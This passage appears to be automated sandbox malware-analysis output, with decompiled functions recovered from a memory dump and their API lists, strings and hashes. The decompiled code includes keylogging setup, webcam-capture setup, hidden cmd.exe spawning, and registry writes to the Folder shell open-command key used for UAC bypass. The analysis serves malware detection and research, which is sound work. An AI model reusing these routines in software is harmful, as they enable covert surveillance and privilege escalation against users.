								__imp__GetModuleFileNameExW(_t120, 0, _t77, 0x208);
								__eflags = _t77;
								if(_t77 == 0) {
									E00403549( &_v8, E004036F7( &_v24, "-"));
									E00405FEB(_v24);
									_t29 =  &_v24;
									 *_t29 = _v24 & 0x00000000;
									__eflags =  *_t29;
								} else {
									E00403549( &_v8, E004036F7( &_v20,  &_v1644));
									E00405FEB(_v20);
									_v20 = _v20 & 0x00000000;
								}
								CloseHandle(_t120);
							}
							_t124 = _t124 - 0xc;
							_t121 = _t124;
							 *_t124 = _v16;
							E0040373F(_t121 + 4,  &_v12);
							E0040373F(_t121 + 8,  &_v8);
							E00401612( &_v44);
							E00401468( &_v16);
							_t73 = Process32NextW(_t113,  &_v604);
							_push(0);
							_pop(0);
							__eflags = _t73;
						} while (__eflags != 0);
						CloseHandle(_t113);
						goto L14;
					} else {
						CloseHandle(_t113);
						E0040136C(_t91, _t127,  &_v44);
						_t89 = _v44;
						if(_t89 != 0) {
							_t122 =  *(_t89 - 4);
							_t117 = _t122 * 0xc + _t89;
							if(_t122 != 0) {
								do {
									_t117 = _t117 - 0xc;
									E00401468(_t117);
									_t122 = _t122 - 1;
								} while (_t122 != 0);
							}
						}
					}
				}
				return _t91;
			}



































                                  0x004122ca
                                  0x004122ca
                                  0x004122e5
                                  0x004122e7
                                  0x004122ec
                                  0x004122ef
                                  0x004122fc
                                  0x00412301
                                  0x00412302
                                  0x00412305
                                  0x00412308
                                  0x00412316
                                  0x0041231b
                                  0x004124a3
                                  0x004124a9
                                  0x004124ae
                                  0x004124b1
                                  0x004124b3
                                  0x004124b5
                                  0x004124bb
                                  0x004124bd
                                  0x004124bf
                                  0x004124c1
                                  0x004124c1
                                  0x004124c6
                                  0x004124cb
                                  0x004124cb
                                  0x004124cb
                                  0x004124c1
                                  0x004124bf
                                  0x00412321
                                  0x00412321
                                  0x00412329
                                  0x0041232f
                                  0x00412331
                                  0x00412374
                                  0x0041237d
                                  0x00412387
                                  0x0041238a
                                  0x0041238d
                                  0x004123a4
                                  0x004123a6
                                  0x004123a9
                                  0x00412440
                                  0x00412448
                                  0x0041244d
                                  0x0041244d
                                  0x0041244d
                                  0x004123af
                                  0x004123bd
                                  0x004123c2
                                  0x004123c5
                                  0x004123d4
                                  0x004123da
                                  0x004123dc
                                  0x00412415
                                  0x0041241d
                                  0x00412422
                                  0x00412422
                                  0x00412422
                                  0x004123de
                                  0x004123f1
                                  0x004123f9
                                  0x004123fe
                                  0x004123fe
                                  0x00412427
                                  0x00412427
                                  0x00412454
                                  0x00412457
                                  0x00412459
                                  0x00412462
                                  0x0041246e
                                  0x00412476
                                  0x0041247e
                                  0x0041248b
                                  0x00412491
                                  0x00412493
                                  0x00412494
                                  0x00412494
                                  0x0041249d
                                  0x00000000
                                  0x00412333
                                  0x00412334
                                  0x00412340
                                  0x00412345
                                  0x0041234a
                                  0x00412350
                                  0x00412356
                                  0x0041235a
                                  0x00412360
                                  0x00412360
                                  0x00412365
                                  0x0041236a
                                  0x0041236a
                                  0x0041236f
                                  0x0041235a
                                  0x0041234a
                                  0x00412331
                                  0x004124d6

                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412310
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412329
                                  • CloseHandle.KERNEL32(00000000), ref: 00412334
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • OpenProcess.KERNEL32(00001410,00000000,?,?), ref: 0041239E
                                  • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 004123D4
                                  • CloseHandle.KERNEL32(00000000), ref: 00412427
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0041248B
                                  • CloseHandle.KERNEL32(00000000), ref: 0041249D
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$Process32lstrcpylstrlen$CreateFileFirstFreeModuleNameNextOpenProcessSnapshotToolhelp32Virtual
                                  • String ID:
                                  • API String ID: 3514491001-0
                                  • Opcode ID: babc51e94c953db9c4795247eb29058f625cbeb4a831d280a4be1ab3179b6415
                                  • Instruction ID: 76f310ec451ec7d85fc7bdc68f8874500a32d320933bf00d65e3e2fac8afd17e
                                  • Opcode Fuzzy Hash: babc51e94c953db9c4795247eb29058f625cbeb4a831d280a4be1ab3179b6415
                                  • Instruction Fuzzy Hash: 86519472D00219ABCB10EBA5CD49AEF7B78AF54719F00017AF405B32D0DB789E85CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412155, Relevance: 12.0, APIs: 8, Instructions: 45processstringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00412155(WCHAR** __ecx) {
				short _v524;
				intOrPtr _v552;
				void* _v560;
				struct tagPROCESSENTRY32W* _t8;
				WCHAR* _t9;
				WCHAR** _t17;
				void* _t19;

				_t17 = __ecx;
				_v560 = 0x22c;
				_t19 = CreateToolhelp32Snapshot(2, 0);
				if(_t19 == 0xffffffff) {
					L6:
					return 0;
				}
				_t8 =  &_v560;
				Process32FirstW(_t19, _t8);
				while(_t8 != 0) {
					_t9 = CharLowerW( *_t17);
					if(lstrcmpW(CharLowerW( &_v524), _t9) == 0) {
						CloseHandle(_t19);
						return _v552;
					}
					_t8 = Process32NextW(_t19,  &_v560);
				}
				CloseHandle(_t19);
				goto L6;
			}










                                  0x00412164
                                  0x00412166
                                  0x00412176
                                  0x0041217b
                                  0x004121c7
                                  0x00000000
                                  0x004121c7
                                  0x0041217d
                                  0x00412185
                                  0x004121bc
                                  0x0041218f
                                  0x004121ac
                                  0x004121ce
                                  0x00000000
                                  0x004121d4
                                  0x004121b6
                                  0x004121b6
                                  0x004121c1
                                  0x00000000

                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412170
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412185
                                  • CharLowerW.USER32(00000000), ref: 0041218F
                                  • CharLowerW.USER32(?), ref: 0041219D
                                  • lstrcmpW.KERNEL32(00000000,?,00000000), ref: 004121A4
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 004121B6
                                  • CloseHandle.KERNEL32(00000000), ref: 004121C1
                                  • CloseHandle.KERNEL32(00000000), ref: 004121CE
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CharCloseHandleLowerProcess32$CreateFirstNextSnapshotToolhelp32lstrcmp
                                  • String ID:
                                  • API String ID: 1363071124-0
                                  • Opcode ID: 7127dcae3be97b314b06170a2d2ab854ee7541e6bcbe1cc0915e3935ee5c82da
                                  • Instruction ID: 4666fb41372ad6f73eaae79bd09a069f05ab8e19623d47d36fdabbe8d344061e
                                  • Opcode Fuzzy Hash: 7127dcae3be97b314b06170a2d2ab854ee7541e6bcbe1cc0915e3935ee5c82da
                                  • Instruction Fuzzy Hash: 9B018F71505224BBD711ABB4AC4CEDF7BBCEB09351F1481A1FA01D2290D77889928B7D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00414CB1, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168comCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 52%
                                  			E00414CB1(signed int __ecx, signed int _a4) {
				intOrPtr _v38;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v112;
				char _v128;
				intOrPtr _v132;
				char _v200;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr* _t58;
				intOrPtr* _t60;
				intOrPtr* _t71;
				signed int _t76;
				intOrPtr* _t78;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t85;
				signed int _t91;
				intOrPtr* _t96;
				intOrPtr* _t97;
				intOrPtr* _t104;
				signed int _t107;
				intOrPtr* _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				intOrPtr* _t118;
				void* _t119;
				void* _t120;
				void* _t121;

				_t76 = __ecx;
				__imp__CoInitialize(0);
				_t111 = __ecx + 0x18;
				__imp__CoCreateInstance(0x4175c0, 0, 1, 0x41a79c, _t111);
				_t78 =  *_t111;
				if(_t78 != 0) {
					_t104 = __ecx + 0x1c;
					_t49 =  *((intOrPtr*)( *_t78))(_t78, 0x4175a0, _t104);
					_t79 =  *_t104;
					if(_t79 != 0) {
						_t49 =  *((intOrPtr*)( *_t79 + 4))(_t79);
						_t112 = __ecx + 0x20;
						if(_t112 != 0) {
							_t49 = E00414A12(_a4, _t112);
						}
						if( *_t112 != 0) {
							_t113 = _t76 + 0x24;
							__imp__CoCreateInstance(0x417610, 0, 1, 0x41a78c, _t113);
							_t80 =  *_t113;
							if(_t80 != 0) {
								 *((intOrPtr*)( *_t80 + 0xc))(_t80,  *((intOrPtr*)(_t76 + 0x20)), L"Source");
								_t54 =  *_t113;
								 *((intOrPtr*)( *_t54 + 0xc))(_t54,  *_t104, L"Grabber");
								E00401052( &_v128, 0, 0x48);
								_t58 =  *((intOrPtr*)(_t76 + 0x18));
								_t121 = _t120 + 0xc;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								 *((intOrPtr*)( *_t58 + 0x10))(_t58,  &_v128);
								_t49 = E0041462F();
								 *((intOrPtr*)(_t76 + 0x28)) = _t49;
								if(_t49 != 0) {
									_t49 = E0041464B();
									 *((intOrPtr*)(_t76 + 0x2c)) = _t49;
									if(_t49 != 0) {
										_t85 =  *((intOrPtr*)(_t76 + 0x24));
										_t49 =  *((intOrPtr*)( *_t85 + 0x2c))(_t85,  *((intOrPtr*)(_t76 + 0x28)), _t49);
										if(_t49 >= 0) {
											_t60 =  *((intOrPtr*)(_t76 + 0x18));
											 *((intOrPtr*)( *_t60 + 0x14))(_t60,  &_v200);
											E0040102C(_t119 + _v132 + 0x30 - _v132 - 0x60, _v132 + 0x30, 0x28);
											E00414492( &_v200);
											_t107 = _a4;
											E00414AD1(_t76, _v132 + 0x30, _t107, _v44, _v48, _v38);
											E00405DE9(_t76 & 0xffffff00 | _t107 -  *((intOrPtr*)(_t76 + 0xc)) > 0x00000000);
											_t91 = 7;
											memcpy(_t121 + 0xc - 0x1c,  *( *((intOrPtr*)(_t76 + 4)) + _t107 * 4), _t91 << 2);
											E0041457F( *_t76);
											_t49 = E0041462F();
											 *((intOrPtr*)(_t76 + 0x30)) = _t49;
											if(_t49 != 0) {
												_t71 =  *((intOrPtr*)(_t76 + 0x18));
												 *((intOrPtr*)( *_t71 + 0x24))(_t71,  *_t76, 0);
												_t96 =  *((intOrPtr*)(_t76 + 0x24));
												_t118 = _t76 + 0x34;
												_t49 =  *((intOrPtr*)( *_t96))(_t96, 0x4175e0, _t118);
												_t97 =  *_t118;
												if(_t97 != 0) {
													return  *((intOrPtr*)( *_t97 + 0x1c))(_t97);
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t49;
			}
































                                  0x00414cbf
                                  0x00414cc1
                                  0x00414cc7
                                  0x00414cd9
                                  0x00414cdf
                                  0x00414ce3
                                  0x00414ceb
                                  0x00414cf5
                                  0x00414cf7
                                  0x00414cfb
                                  0x00414d04
                                  0x00414d07
                                  0x00414d0c
                                  0x00414d13
                                  0x00414d13
                                  0x00414d1b
                                  0x00414d21
                                  0x00414d33
                                  0x00414d39
                                  0x00414d3d
                                  0x00414d4e
                                  0x00414d51
                                  0x00414d5d
                                  0x00414d68
                                  0x00414d72
                                  0x00414d78
                                  0x00414d7e
                                  0x00414d81
                                  0x00414d82
                                  0x00414d83
                                  0x00414d8c
                                  0x00414d8d
                                  0x00414d8e
                                  0x00414d8f
                                  0x00414d92
                                  0x00414d98
                                  0x00414d9d
                                  0x00414da2
                                  0x00414dab
                                  0x00414db0
                                  0x00414db5
                                  0x00414dbb
                                  0x00414dc5
                                  0x00414dca
                                  0x00414dd0
                                  0x00414ddd
                                  0x00414df2
                                  0x00414e00
                                  0x00414e08
                                  0x00414e14
                                  0x00414e1f
                                  0x00414e2f
                                  0x00414e32
                                  0x00414e36
                                  0x00414e3e
                                  0x00414e43
                                  0x00414e48
                                  0x00414e4a
                                  0x00414e54
                                  0x00414e57
                                  0x00414e5a
                                  0x00414e66
                                  0x00414e68
                                  0x00414e6c
                                  0x00000000
                                  0x00414e71
                                  0x00414e6c
                                  0x00414e48
                                  0x00414dca
                                  0x00414db5
                                  0x00414da2
                                  0x00414d3d
                                  0x00414d1b
                                  0x00414cfb
                                  0x00414e78

                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 00414CC1
                                  • CoCreateInstance.OLE32(004175C0,00000000,00000001,0041A79C,?), ref: 00414CD9
                                  • CoCreateInstance.OLE32(00417610,00000000,00000001,0041A78C,?), ref: 00414D33
                                    • Part of subcall function 00414A12: CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?), ref: 00414A40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInstance$Initialize
                                  • String ID: Grabber$Source$vids
                                  • API String ID: 1108742289-4200688928
                                  • Opcode ID: a8aeeb8cf2cab8e24f88fce5b960f0a0a2b9a748dd8ec08587ead78164211a85
                                  • Instruction ID: c707b6f7033061667e34d12cbb2bfaee6e47a2410d4a0b7bdeab57eb5d8e2362
                                  • Opcode Fuzzy Hash: a8aeeb8cf2cab8e24f88fce5b960f0a0a2b9a748dd8ec08587ead78164211a85
                                  • Instruction Fuzzy Hash: 1C518A71600200AFDF14DF64C885E9A3BB6BF89715B2041ADFD05AF291CB79ED85CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407A8E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64sleepprocessmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E00407A8E(void* __eflags) {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				CHAR* _t27;

				_v8 = 0;
				E00410CFF( &_v8);
				_t27 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
				GetWindowsDirectoryA(_t27, 0x104);
				E0040102C( &(_t27[lstrlenA(_t27)]), "\\System32\\cmd.exe", 0x14);
				E00401052( &_v100, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreateProcessA(_t27, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24) == 0) {
					return E00410CD8(_v8);
				}
				Sleep(0x3e8);
				return _v24.dwProcessId;
			}







                                  0x00407a9c
                                  0x00407a9f
                                  0x00407ab7
                                  0x00407abf
                                  0x00407ad6
                                  0x00407ae2
                                  0x00407aec
                                  0x00407af0
                                  0x00407af1
                                  0x00407af2
                                  0x00407b0f
                                  0x00000000
                                  0x00407b24
                                  0x00407b16
                                  0x00000000

                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,00000000,?,?), ref: 00407AB1
                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00407ABF
                                  • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 00407ACD
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00407B07
                                  • Sleep.KERNEL32(000003E8), ref: 00407B16
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocCreateDirectoryProcessSleepVirtualWindowslstrlen
                                  • String ID: \System32\cmd.exe
                                  • API String ID: 2560724043-2003734499
                                  • Opcode ID: b3de0a5e209d2120b9e275e8d83ec7119fedad0186483f74c4aeae4fe557b3e5
                                  • Instruction ID: 526d35256bd352fe19e6f9b51bef16261156da3b9883bb0cb5aadd8e9d8f3863
                                  • Opcode Fuzzy Hash: b3de0a5e209d2120b9e275e8d83ec7119fedad0186483f74c4aeae4fe557b3e5
                                  • Instruction Fuzzy Hash: E51170B1A4430DBBE710A7A9CC86FEF767CEB04748F000036F206B6191DA74AE0586A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412E91, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00412E91() {
				void* _v8;
				int _v12;
				int _v16;
				struct _SECURITY_DESCRIPTOR* _v20;
				struct _SECURITY_ATTRIBUTES _v24;
				struct _SECURITY_DESCRIPTOR _v44;
				long _t20;

				if(InitializeSecurityDescriptor( &_v44, 1) == 0 || SetSecurityDescriptorDacl( &_v44, 1, 0, 0) == 0) {
					L5:
					return 0;
				} else {
					_v24 = 0xc;
					_v20 =  &_v44;
					_v16 = 0;
					_t20 = RegCreateKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0, 0, 0x20006,  &_v24,  &_v8,  &_v12);
					if(_t20 != 0) {
						SetLastError(_t20);
						goto L5;
					}
					RegCloseKey(_v8);
					return 1;
				}
			}










                                  0x00412ea6
                                  0x00412f08
                                  0x00000000
                                  0x00412ebc
                                  0x00412ebf
                                  0x00412ec6
                                  0x00412ed0
                                  0x00412eea
                                  0x00412ef2
                                  0x00412f02
                                  0x00000000
                                  0x00412f02
                                  0x00412ef7
                                  0x00000000
                                  0x00412efd

                                  APIs
                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,00413187), ref: 00412E9E
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,00413187), ref: 00412EB2
                                  • RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,00413187,?), ref: 00412EEA
                                  • RegCloseKey.ADVAPI32(00413187), ref: 00412EF7
                                  • SetLastError.KERNEL32(00000000), ref: 00412F02
                                  Strings
                                  • Software\Classes\Folder\shell\open\command, xrefs: 00412EE0
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: DescriptorSecurity$CloseCreateDaclErrorInitializeLast
                                  • String ID: Software\Classes\Folder\shell\open\command
                                  • API String ID: 1473660444-2536721355
                                  • Opcode ID: f4a9b6598db950cac999bcfd18d51eb7d783ea20bfab151884b3b51fb57c84b6
                                  • Instruction ID: 82a2526e36d2d6463d42065251312d8bdf4d9f0b426d0c692092d159b657fe2b
                                  • Opcode Fuzzy Hash: f4a9b6598db950cac999bcfd18d51eb7d783ea20bfab151884b3b51fb57c84b6
                                  • Instruction Fuzzy Hash: C5011A71905228AADF209BA19D49FDFBFBDEF09750F004122FA05F2140D7B49685DAA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040906F, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040906F(char _a4, intOrPtr _a8) {
				void _v28;
				void* _t13;
				signed int _t14;

				InitializeCriticalSection( &_v28);
				_t14 = 6;
				DeleteCriticalSection(memcpy(0x55a808,  &_v28, _t14 << 2));
				EnterCriticalSection(0x55a808);
				_t5 =  &_a4; // 0x402f48
				 *0x55a830 =  *_t5;
				GetModuleHandleA(0);
				 *0x42675c = 0x559de0;
				if(_a8 == 0) {
					E00401F98(0x55a854);
					 *0x559de0 = 1;
					_t13 = E00401F6D(0x55a84c, E00408D0F, 0x559de0);
				} else {
					_t13 = E00401F6D(0x55a854, E00407F94, 0x559de0);
					 *0x55a7f4 = 1;
				}
				LeaveCriticalSection(0x55a808);
				return _t13;
			}






                                  0x0040907b
                                  0x00409083
                                  0x00409092
                                  0x0040909e
                                  0x004090a4
                                  0x004090a9
                                  0x004090ae
                                  0x004090bd
                                  0x004090c8
                                  0x004090e1
                                  0x004090f1
                                  0x004090fb
                                  0x004090ca
                                  0x004090d0
                                  0x004090d5
                                  0x004090d5
                                  0x00409101
                                  0x0040910a

                                  APIs
                                  • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040907B
                                  • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 00409092
                                  • EnterCriticalSection.KERNEL32(0055A808,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040909E
                                  • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 004090AE
                                  • LeaveCriticalSection.KERNEL32(0055A808,?,00000000), ref: 00409101
                                    • Part of subcall function 00401F6D: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00401F82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
                                  • String ID: H/@
                                  • API String ID: 2964645253-3842538647
                                  • Opcode ID: 7251a566045f706d7ca5ef1436c7077981233550bcd5c9d1227c9b9e5285168c
                                  • Instruction ID: f99a12277a3120933ea65728b4e70e144b28dbd7bebc7df26f1967f06ae464e9
                                  • Opcode Fuzzy Hash: 7251a566045f706d7ca5ef1436c7077981233550bcd5c9d1227c9b9e5285168c
                                  • Instruction Fuzzy Hash: 9D017131A04205ABCB10AB65EC19BDB3FB9FB44716F00413BFA05A72D1C779544ACB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040910D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 38libraryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0040910D() {
				intOrPtr _t1;

				_t1 = 5;
				 *0x55a804 = _t1;
				 *0x559dec = 0;
				 *0x55a7fc = _t1;
				 *0x55a800 = 0;
				E004018C7(0x55a7f8, 0);
				InitializeCriticalSection(0x55a808);
				E004113ED(0x55a834, 0);
				asm("xorps xmm0, xmm0");
				 *0x55a820 = 0;
				asm("movups [0x55a84c], xmm0");
				 *0x55a830 = 0;
				_t19 = LoadLibraryW(L"User32.dll");
				_push(0x55a834);
				 *0x55a824 = E00411E88(_t4, "GetRawInputData", 0);
				 *0x55a82c = E00411E88(_t19, "ToUnicode", 0);
				 *0x55a828 = E00411E88(_t19, "MapVirtualKeyA", 0);
				return 0x559de0;
			}




                                  0x00409110
                                  0x00409113
                                  0x0040911d
                                  0x00409123
                                  0x00409128
                                  0x0040912e
                                  0x00409138
                                  0x00409143
                                  0x00409148
                                  0x0040914b
                                  0x00409156
                                  0x0040915d
                                  0x00409169
                                  0x00409170
                                  0x0040917d
                                  0x0040918e
                                  0x0040919b
                                  0x004091a6

                                  APIs
                                  • InitializeCriticalSection.KERNEL32(0055A808,?,00401251), ref: 00409138
                                  • LoadLibraryW.KERNEL32(User32.dll,?,00401251), ref: 00409163
                                    • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalInitializeLibraryLoadSectionlstrcmp
                                  • String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
                                  • API String ID: 4274177235-2474467583
                                  • Opcode ID: 722d443ab0ccf9adfafb109646b35116b9ee6f38e4403bfd207fed41f56d27f2
                                  • Instruction ID: d1db26310c3b7d33376476d0bb5eea29622b7161c180695f05f3ce86934a789e
                                  • Opcode Fuzzy Hash: 722d443ab0ccf9adfafb109646b35116b9ee6f38e4403bfd207fed41f56d27f2
                                  • Instruction Fuzzy Hash: 980144B16643504B8700AB697C255693EF1FB9D702310832FE90497360E73809CBDB8E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412E2C, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38registrystringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 73%
                                  			E00412E2C(void* __ecx, char* _a4, CHAR* _a8) {
				void* _v8;
				long _t9;
				int _t12;
				int _t15;
				long _t16;

				_t15 = lstrlenA(_a8);
				_t9 = RegOpenKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0x20006,  &_v8);
				if(_t9 == 0) {
					_t16 = RegSetValueExA(_v8, _a4, 0, 1, _a8, _t15);
					RegCloseKey(_v8);
					if(_t16 == 0) {
						_t12 = 1;
					} else {
						_push(_t16);
						goto L2;
					}
				} else {
					_push(_t9);
					L2:
					SetLastError();
					_t12 = 0;
				}
				return _t12;
			}








                                  0x00412e3a
                                  0x00412e51
                                  0x00412e59
                                  0x00412e7d
                                  0x00412e7f
                                  0x00412e87
                                  0x00412e8c
                                  0x00412e89
                                  0x00412e89
                                  0x00000000
                                  0x00412e89
                                  0x00412e5b
                                  0x00412e5b
                                  0x00412e5c
                                  0x00412e5c
                                  0x00412e62
                                  0x00412e62
                                  0x00412e90

                                  APIs
                                  • lstrlenA.KERNEL32(004131BE,00418FE6,?,?,004131BE,00418FE6,?), ref: 00412E34
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?,?,?,004131BE,00418FE6,?), ref: 00412E51
                                  • SetLastError.KERNEL32(00000000,?,?,004131BE,00418FE6,?), ref: 00412E5C
                                  • RegSetValueExA.ADVAPI32(?,00418FE6,00000000,00000001,004131BE,00000000,?,?,004131BE,00418FE6,?), ref: 00412E74
                                  • RegCloseKey.ADVAPI32(?,?,?,004131BE,00418FE6,?), ref: 00412E7F
                                  Strings
                                  • Software\Classes\Folder\shell\open\command, xrefs: 00412E47
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseErrorLastOpenValuelstrlen
                                  • String ID: Software\Classes\Folder\shell\open\command
                                  • API String ID: 1613093083-2536721355
                                  • Opcode ID: 31a94de38354eca2784d2d112a83c47bf72bfd193ace401840464e10e3bc09ab
                                  • Instruction ID: ffd4354489f07140ccd769c490119bd97119082caabcfac067ebab19d0d729b9
                                  • Opcode Fuzzy Hash: 31a94de38354eca2784d2d112a83c47bf72bfd193ace401840464e10e3bc09ab
                                  • Instruction Fuzzy Hash: 0BF0CD35540318BBDF211FA09D09FDB3F79AB09790F108160F902A6160C2B58A61ABA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F238, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E0040F238(intOrPtr _a4) {
				intOrPtr* _t2;
				_Unknown_base(*)()* _t8;
				struct HINSTANCE__* _t10;

				_t2 =  *0x55adb8;
				if(_t2 == 0) {
					L2:
					_t10 = GetModuleHandleW(L"ntdll.dll");
					 *0x55adb8 = GetProcAddress(_t10, "RtlNtStatusToDosError");
					_t8 = GetProcAddress(_t10, "RtlSetLastWin32Error");
					_t2 =  *0x55adb8;
					 *0x55ad94 = _t8;
				} else {
					_t8 =  *0x55ad94;
					if(_t8 == 0) {
						goto L2;
					}
				}
				if(_t2 != 0 && _t8 != 0) {
					return  *0x55ad94( *_t2(_a4));
				}
				return _t2;
			}






                                  0x0040f23b
                                  0x0040f242
                                  0x0040f24e
                                  0x0040f25a
                                  0x0040f26e
                                  0x0040f279
                                  0x0040f27b
                                  0x0040f280
                                  0x0040f244
                                  0x0040f244
                                  0x0040f24c
                                  0x00000000
                                  0x00000000
                                  0x0040f24c
                                  0x0040f289
                                  0x00000000
                                  0x0040f295
                                  0x0040f29c

                                  APIs
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,0040FC57,00000000), ref: 0040F254
                                  • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError,?,0040FC57,00000000), ref: 0040F262
                                  • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error,?,0040FC57,00000000), ref: 0040F273
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$HandleModule
                                  • String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                  • API String ID: 667068680-2897241497
                                  • Opcode ID: 6eed301b0b0b6b1f2085c8ee6f635985884be4a7adf6b0daa38cad27219b9fb4
                                  • Instruction ID: fa32091ee75a1baed7f6170c370dd1564c17c489402f95e3a669c5805b8ffe79
